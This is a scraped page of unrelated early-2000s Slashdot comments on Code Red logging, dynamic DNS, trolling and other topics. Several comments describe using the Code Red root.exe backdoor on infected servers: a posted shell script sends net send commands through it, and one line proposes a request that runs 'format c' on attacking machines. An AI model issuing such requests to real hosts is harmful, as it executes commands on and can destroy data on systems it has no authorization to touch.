Slashdot Mirror

I ran your little perl script in your signature, and your e-mail address was spit out as richard@krogoth.dyndns.org. Is that the correct address?

Thanks and have a nice day.

You can slashdot my server or get it on Freenet: KSK@kernel-2.4.9-2.4.10 or KSK@kernel-2.4.10.

I remember reading something about someone doing this back when CodeRed II came out. He had a simple CGI to submit a shutdown command to the inquiring machine. Cool. :)

I also have running totals of Code Red hits and of this new attack (the numbers for the Unicode vulnerability are pretty shocking by comparison).

What about something less intrusive? Pop up a message box with a notice that someone broke into the computer, perhaps with a message beep every minute?

There is a well known HOWTO on this very subject.

Although, it has to be said that these days a 'Troll' moderation is simply a sign that you went against the slashdot 'groupthink'.

You might want to try another site adequacy.org which welcomes trolls of all kinds with open arms :-)

This is what I am afraid of! :(

Please read my essay and if you like it pass it on to people. We can't let this happen. I have been saying this since day one. Please please think about this :(

The Price of Freedom

Jeremy

My thoughts on the matter are summed up in an essay I wrote addressing what I feel will be most important in the coming months. I would like for anyone reading my essay to share their feelings.

The Price of Freedom

Thanks

Jeremy

On another note (we really need to be able to edit comments...)

The Linksys is supported by almost all of the Dynamic DNS scripts available. I use ipcheck with the custom domain option. It works fantastic -- stick it in the crontab, run it every 5 minutes.

Useful if you plan to do anything interesting with your phat broadband.

http://salfter.dyndns.org/graphics/binladen.jpg

Our sympathies to the relatives of the victims of the World Trade Center collapse.

Now do the right thing, Mr. Bush -- if Osama bin Laden was behind this, find him and his henchmen and blow them into the next dimension.

Our sympathies to the relatives of the victims of the World Trade Center collapse.

Now do the right thing, Mr. Bush -- if Osama bin Laden was behind this, find him and his henchmen and blow them into the next dimension.

Our sympathies to the relatives of the victims of the World Trade Center collapse.

Now do the right thing, Mr. Bush -- if Osama bin Laden was behind this, find him and his henchmen and blow them into the next dimension.

Im putting together a news summary and a mirror for a bunch of multimedia here. Ill continue to work on it as developments continue.

My silly little perl script, "SAMBRU" (SAMsung Backup and Restore Utility) can pull data out of a samsung 6100/8500 Sprint PCS phone, and save it in vcard format, which can then be read into gnome-card, which can then be exported to your Pilot... I always wanted to write a palm app to do it directly, never got around to it.

hrm.. looks like I still have to get nero though. I can't burn a vcd or svcd.

readying content eh? Doesn't that remind anyone of excite's now-doomed business model?

The @Home business, although not stellar, has been able to round up significantly more subscribers than DSL. If or when the company goes under, it's because the content/portal side hemorrhaged money.

(They do a pretty good job of keeping it running, too...a hell of a lot better than Sprint does at keeping DSL going. We have both cable-modem and DSL service at work (don't ask why). For the past two weeks or so, the DSLAM that services our part of town has been on-and-off. Before that, there have been other reliability issues. The worst that's happened with the cable modem, OTOH, are all the morons running unpatched IIS who've let their systems get infected with the Code Red worm.)

you could just leave your box on 24/7 and go here =)

This is already implemented over here in melbourne, australia.

the link: http://melbwireless.dyndns.org/

I know a few people who are running non-infected Web Servers and they're still getting a fair amount of traffic related to the Code Red (and variants) virus.

5877 attempts logged from 2140 hosts as of now. 129 of them are from today. It's tapered off, and a greater proportion is from other service providers, but it's still coming in. My server auto-responds to each attack attempt with a popup on the remote console.

Unfortunately, it seems like this is going to come up again and again. The best solution I can think of is a HTML meta tag or HTTP header like "HTTP-Dont-Fuck-With: yes".

<meta name="MSSmartTagsPreventParsing" content="TRUE">

I have this in the template for my website, so it appears on all my pages. I also just added in this little blurb to go along with the copyright notice at the bottom:

This is an ad-free website. If advertising material appears on any page in this website, it indicates that you have software installed on your computer (probably without your knowledge) that is inserting the ads. Such defacement is a violation of copyright, and I'd appreciate it if you'd contact me [there's an email link here] so that we can figure out what software is interfering with your browsing experience and so that I can go after the company that's responsible for this defacement.

I thought this was pretty funny too, but that's because I just read the exact same post on the The /. troll HOWTO. Heh. The best way to kill a troll is to shine light on it.

Funny this should be brought up, I just finished getting my shoutcast stream working that plays exclusively Gameboy MIDIs. Tune in.

From my troll archive here :) It was too good an opportunity to miss, and 70% doesn't mind...

-- spiralx

Awesome, I had the exact same idea, and want to eventually do it with http://melbwireless.dyndns.org but most everyone that I told about my idea either didn't understand it or thought I was crazy. you get a couple dozen people with modems and you have a megabit connection to the net. sounds cool to me... shrug.

This is textbook stuff man, straight out of the HOWTO

Anyway, uoriginality is fine, its like, a biting satirical comment on the unoriginality of all the other opinions on display here or something.

maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red

Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.

I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
+h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done

Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

I'm stuck in a Win2k lab at the moment and the IE5 here must be different from everyone else's IE5. It crashes CONSTANTLY. It abhors PNGs.

try dyndns.org

In yesterday's Code Red story I saw:

Re:Apache users Create default.ida 5mb!!!! (Score:3, Interesting) by Anonymous Coward on Sunday August 05, @06:16PM PDT Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.

It's entirely possible to modify this script to connect back on port 80 instead of 25. You've got a root shell on their box; the good (or evil) that can be done after that is limited only by your imagination and knowlege of winboxes.

I'm on Earthlink DSL in Northern VA, and my server has been going crazy (on the 4.0.0.0 net).
Most of my Code Red hits have been from 4.0.0.0 and 24.0.0.0.

Up past 1200 hits so far just since Sunday. My Code Red hit log can be found here (wonderful Perl script provided by a fellow Slashdotter):

http://stealthboy.dyndns.org/report.html

http://damagebox.dyndns.org/

That box is our new Linux server, but it's not on a fat pipe yet. Should work reliably, albeit slowly. Sorry about the inconvenience.

-Scott

I sent out email a while back to the 74 hosts known to be infected at the time. Hopefully a few of them will get a clue and fix their servers. (Then again, if they're running "Internet Infection Server" on publically-available servers, they must've been clue-deficient to begin with. :-) )

Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.

I have had 218 IP changes for my "always on" connection since June 2, 2001. The changes seem to be random except for a regular one every 64 hours - the rollover time I guess. most IP changes coincide with a minor outage (less than 2 seconds in most cases).

I just set up a page-generator to give some statistics for my logs. Here it is.

I thought I might use it at work tomorrow, but you guys can take a look at it.

My perl script is also up there, if you guys want it. It looks at the logs, and separates out Code Red 1 and Code Red 2 hits into different files. It also gathers a tiny bit of statistics, like # of code red 1 hits, # of code red 2 hits, and # of hits total.

The cool thing about my perl script is that it generates a new "index.html" for you every 30 seconds with updated statistics on it. (not like that was hard to do though. ;)

I guess I'm arguing that intelligence is a function of pathway complexity and self-referentiality (real word?).

Its being done, at least sort of. (Check here if you don't have access to New Scientist)

I wouldn't be surprised if a large portion of hardware and software is created this way in the future.

I just got around to "installing" MonMotha's iptables firewall. I'm really quite pleased with it considering I had it configured and running within 5 minutes. It's really just a configurable script to apply iptables rules, and I hardly had to make any changes. For example, I need NFS and FTP within my LAN, but I don't want the outside world to be able to see it. Easily done with this script. Plus it has other features, like protection from ping flooding. It's not the last word in security, but for someone on a little dialup system with a few computers connected, it's a hell of a lot better than nothing at all.

If (very theoretically speaking) we had never had libraries until the current day, and someone tried to start them, I think that the newfound libraries would be sued into the ground.

A library does exactly what Napster\Gnutella etc do, or try to do... allow people to pool their resources to have access to a large amount of copyrighted information.

And much like P2P, libraries don't seem to cause a large dent in the sale of books. There are enough realtivly wealthy people around who enjoy owning books and would still rather pay 20-30 dollars a pop then take a trip to the library.

I made this entire point a little bit more humorously at http://ursine.dyndns.org/~mnoelharris/warezportal. html

Right here.

Check it out if you like.
CSMaster
It's all done with C++ CGIs.
I'm not opposing your statement, I'm upholding it only you left out a piece. C++ is really great for some things, but in certain cases you need scripting languages (even scripts generated on the fly by c++ programs). =)

Me too. Can you get your hands on ADSL? Really cheap, and with dynamic dns (dyndns.org) and a free webserver of your choice (Xitami is a quick and easy one Winblows), you can have gigabytes of webserver space plus nearly unlimited monthly bandwidth (although a capped instantaneous serving-speed of 15 kilobytes/s).

Then they have no recourse but to go directly to you.

Up here we know what to do with concrete. It's a great use of concrete engineering too. More info on the UW concrete toboggan team here

Well, you can get PERL and a Shell

It's very simple to write a page to the standards that works in both Mozilla and recent versions of IE with NO browser sniffing code, you may have to ditch support for IE4 or add some code to cater for IE4 too (not difficult), but you should design pages to the standard spec, it'll then work in Mozilla, in recent versions of Windows IE (most standards are supported now) and Mac IE (which is more standards compliant than the Windows version), also not forgetting Opera.

Been there, done that, have a personal site to prove it. As long as you're not using Nutscrape 4.x or earlier, it dishes out standards-compliant HTML. It's been tested with IE 5.5 and Opera 5.something on Win2K, a fairly old Mozilla on Win98, IE 4.01 and a fairly recent iCab beta on MacOS (7.5.5 on a Quadra 610...old school), and Lynx on Linux. Except for iCab, all the graphical browsers rendered the page more or less the same. The Lynx rendering also looks halfway decent (if I say so myself). I'd attribute iCab's problems to being a beta...it recognizes that the page uses standard HTML and CSS, but doesn't render it properly.

(If my Apache sees that you're using Nutscrape, it runs the HTML through some "moronizer" scripts to make it displayable. It also displays a nag message that you need to get a real browser.)

I had kicked this idea around for a while... but have never gone forward with it because my cable connection is so stable.. this was my idea though.

Get a cheap dial up 56k service or dsl or whatever for your budget.. then you should be able to write some simple scripts to bring up the backup connection when the primary fails.. change your outgoing routes.. and for incoming connections use the DynDns service to handle your domain(s). They have a service that allows them to host your domain and tie the IP into their dynamic dns service...

The ability to blank out ads by size sounded interesting...until he mentioned that the image is still downloaded. If it's still downloaded, it still registers on the server and it probably still has a cookie attached. I think I'll stick with Squid and ad-blocking Perl.

A good place to start is the slashdot troll how-to.

And remember, its not the quality of the troll that counts, its the spirit and love that went into it's creation.

This is actually quite interesting... The US Federal government has repeatedly officially designated encryption algorithms as munitions. Since the US court would be required to either accept this as a stipulation and hear the first amendment argument or reject the notion of encryption as munitions, either way we would have a major victory against overzealous regulation. Nicely done!
for more privacy paranoia, check out Project ELF and My Private Planet.

Here's what it looks like on mine(screenshot)

How do you get it to look nice like yours? You seem to have some nicer looking UI installed, and I don't see a term window(which I couldn't get rid of).

BTW, is there any way to get some graphics acceleration in GIMP? It's slow as shit on my machine.